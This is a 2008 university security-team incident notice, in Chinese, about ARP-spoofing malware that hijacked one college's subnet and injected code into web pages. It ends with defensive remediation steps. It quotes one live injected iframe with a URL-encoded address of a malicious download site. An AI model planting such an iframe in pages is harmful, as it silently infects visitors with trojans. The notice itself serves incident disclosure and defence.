COMPUTER SECURITY INCIDENT RESPONSE TEAM

我校S学院ARP欺骗病毒泛滥

2008.09.26, 11:38, 星期五

事件通告

自2008年8月20日至9月中旬，我校S学院（网段202.116.74.0/24）不断有用户发现，访问各种网站时，包括“百度”和“博济”站点等，会自动连接挂马的恶意网站并下载病毒、木马的现象，致使该院教学和办公受到影响。

经过计算机安全事件响应小组调查分析后，确认事件不是因“百度”和“博济”站点本身挂马引起的，而是因学院网段内有ARP欺骗攻击造成的。发生这种攻击时，感染了ARP欺骗病毒的计算机假冒该网段网关，扮演中间人角色，劫持并篡改了客户端与服务器端之间的通信内容。

如该网段内客户端机器未启用防ARP欺骗的ARP防火墙保护，当访问网页时，“假冒网关”会自动在网页代码头部或尾部添加一段指向恶意网站的代码，如“<iframe src=http://%77%2E%64%35%78%38%2E%63%6F%6D/index3.gif width=100 height=0></iframe>”，一般用户不易察觉，最表面的感觉是访问网页变慢，甚至不通。受这种欺骗影响，客户端会在访问正常网页的同时悄悄地从恶意网站下载各种病毒、木马，而这些网站的病毒、木马受犯罪团伙控制，不断更新，能逃避某些防病毒软件的监控，甚至采取“映像劫持”技术首先禁用防（杀）病毒软件和其它安全辅助工具（如360安全卫士等），并伴有ARP欺骗病毒和U盘蠕虫的性质，使得清除这种病毒变得相当困难。如果重装系统不得法，重装或恢复系统后，病毒很快又感染回重装后的新系统。

经过监测发现，在此期间S学院办公网段内有一台服务器由于存在安全漏洞，给信息犯罪者在部分网页上加插了恶意代码，由于该服务器网站主要提供给S学院的师生浏览，所以在S学院内爆发比较大规模的ARP病毒攻击也就不足为奇了。

在学院网管、用户与信息与网络中心帮助台和CSIRT小组的共同努力下，这场事件于9月中旬平息了。但总结经验教训，为了减少这类事件的发生，各学院应注意如下几点：

• 立即清查各学院部门自行管理的各个网站，确认网页代码有无被篡改过，有则改之。
• 参考Windows服务器安全配置要求，加固网站服务器安全防线。
• 学院教学/办公所用计算机按照个人计算机安全改善指南加强防范。
• 当感染病毒情况比较严重时，只格式化系统分区重装或通过克隆方法恢复系统之前一定要先用Linux Live CD或其它类似工具清除其它硬盘分区根目录下的Autorun.inf及其相关病毒文件。重装或恢复系统后，先不要急着打开其它硬盘分区，而应首先安装正版防病毒软件并升级更新到最新，进行一次全盘扫描。